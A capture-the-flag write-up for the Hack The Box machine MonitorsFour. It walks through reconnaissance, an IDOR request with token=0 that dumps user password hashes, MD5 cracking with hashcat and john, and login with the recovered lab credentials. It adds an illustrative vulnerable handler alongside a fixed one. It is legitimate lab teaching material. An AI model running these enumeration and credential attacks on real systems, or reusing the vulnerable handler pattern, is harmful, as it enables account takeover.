API IDOR

Hack The Box - Season 9 HTB MonitorsFour Writeup - Easy - Weekly - December 6th, 2025

HackTheBox: MonitorsFour - Full Writeup

Box Information

Property        Value
Name            MonitorsFour
OS              Windows (with Docker)
Difficulty      Easy
Key Techniques  API IDOR, Credential Spraying, Cacti RCE, Docker Escape

Executive Summary

MonitorsFour is a Windows machine running a web application with an insecure API endpoint that leaks user credentials via an Insecure Direct Object Reference (IDOR) vulnerability. After cracking MD5 password hashes and performing credential spraying, we gain access to a Cacti network monitoring instance on a subdomain. Exploiting CVE-2025-24367 in Cacti 1.2.28 provides a reverse shell inside a Docker container. The container has network access to an exposed Docker API on the Windows host, which we exploit via CVE-2025-9074 to achieve full system compromise.


Reconnaissance

Initial Port Scan

nmap -sC -sV -oA nmap/monitorsfour 10.10.11.xxx

The scan reveals standard web services. Add the hostname to /etc/hosts:

echo "10.10.11.xxx monitorsfour.htb" | sudo tee -a /etc/hosts

Web Directory Enumeration

Using ffuf for directory brute-forcing with a medium-sized wordlist:

ffuf -t 400 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt \
     -u http://monitorsfour.htb/FUZZ -ac

Key Finding: /user endpoint discovered, returning JSON data.

Subdomain Enumeration

Virtual host enumeration to discover additional attack surface:

ffuf -t 400 -w /usr/share/seclists/Discovery/DNS/combined_subdomains.txt \
     -u http://monitorsfour.htb \
     -H "Host: FUZZ.monitorsfour.htb" -ac

Key Finding: cacti.monitorsfour.htb subdomain discovered.

Add to hosts file:

echo "10.10.11.xxx cacti.monitorsfour.htb" | sudo tee -a /etc/hosts

Vulnerability Assessment

API IDOR Vulnerability

The /user endpoint accepts a token parameter that appears to be a sequential user ID. Testing with token=0 returns all users in the database:

curl -s "http://monitorsfour.htb/user?token=0" | jq

Leaked Credentials:

Username    MD5 Hash          Full Name
admin       [HASH_REDACTED]   (Admin)
mwatson     [HASH_REDACTED]   Marcus Watson
janderson   [HASH_REDACTED]   J. Anderson
dthompson   [HASH_REDACTED]   D. Thompson

Vulnerability Details:

  • Type: Insecure Direct Object Reference (IDOR)
  • Impact: Complete user database enumeration including password hashes
  • Root Cause: No authorization check on the token parameter; value of 0 bypasses user-specific filtering
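To make the root cause concrete, here is an added example (not code from the box or its web application) of how a /user?token= handler ends up with this behaviour, next to a hardened version that enforces object-level authorization and strips the hash from the response. The table layout, the handler shape and the placeholder hash values are assumptions; only the token=0 behaviour matches what the page describes.

```python
from __future__ import annotations
import sqlite3
from typing import Optional

# Constructed sample rows standing in for the user table; hash values are
# placeholders, not the box's real hashes.
SAMPLE_USERS = [
    (1, "admin", "<md5-placeholder-1>", "Admin"),
    (2, "mwatson", "<md5-placeholder-2>", "Marcus Watson"),
    (3, "janderson", "<md5-placeholder-3>", "J. Anderson"),
]

COLS_FULL = ("id", "username", "pw_hash", "fullname")
COLS_SAFE = ("id", "username", "fullname")

def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
                "pw_hash TEXT, fullname TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", SAMPLE_USERS)
    return con

def user_endpoint_vulnerable(con: sqlite3.Connection, token: int) -> list[dict]:
    """Assumed shape of the flawed handler: 'token' is a bare user id taken
    from the query string, there is no session check, and a falsy token
    silently drops the WHERE clause so every row (hashes included) is returned."""
    sql = "SELECT id, username, pw_hash, fullname FROM users"
    params: tuple = ()
    if token:                      # token=0 skips the filter entirely
        sql += " WHERE id = ?"
        params = (token,)
    rows = con.execute(sql, params).fetchall()
    return [dict(zip(COLS_FULL, r)) for r in rows]

def user_endpoint_hardened(con: sqlite3.Connection,
                           session_user_id: Optional[int], token: int) -> list[dict]:
    """Object-level authorization: the identity comes from the server-side
    session, the requested id must match it, and the password hash is never
    selected, so neither token=0 nor another user's id leaks anything."""
    if session_user_id is None or token != session_user_id:
        return []                   # a real handler would answer 403 here
    row = con.execute("SELECT id, username, fullname FROM users WHERE id = ?",
                      (token,)).fetchone()
    return [dict(zip(COLS_SAFE, row))] if row else []
```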

Exploitation

Phase 1: Password Cracking

The leaked hashes are unsalted MD5, making them trivial to crack with a wordlist attack:

# Create hash file
echo "[HASH_REDACTED]" > hashes.txt

# Crack with hashcat (-m 0 = MD5)
hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt

Cracked Password: wonderful1

Alternative using John the Ripper:

john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

Phase 2: Credential Spraying & Web Application Access

With the password wonderful1 and usernames extracted from the API (including full names like "Marcus Watson"), we derive potential usernames and perform credential spraying.

Main Application Login:

Navigate to http://monitorsfour.htb/login and test credentials:

  • Valid Credentials: marcus:wonderful1

The username marcus was derived from the full name "Marcus Watson" (mwatson) returned by the API.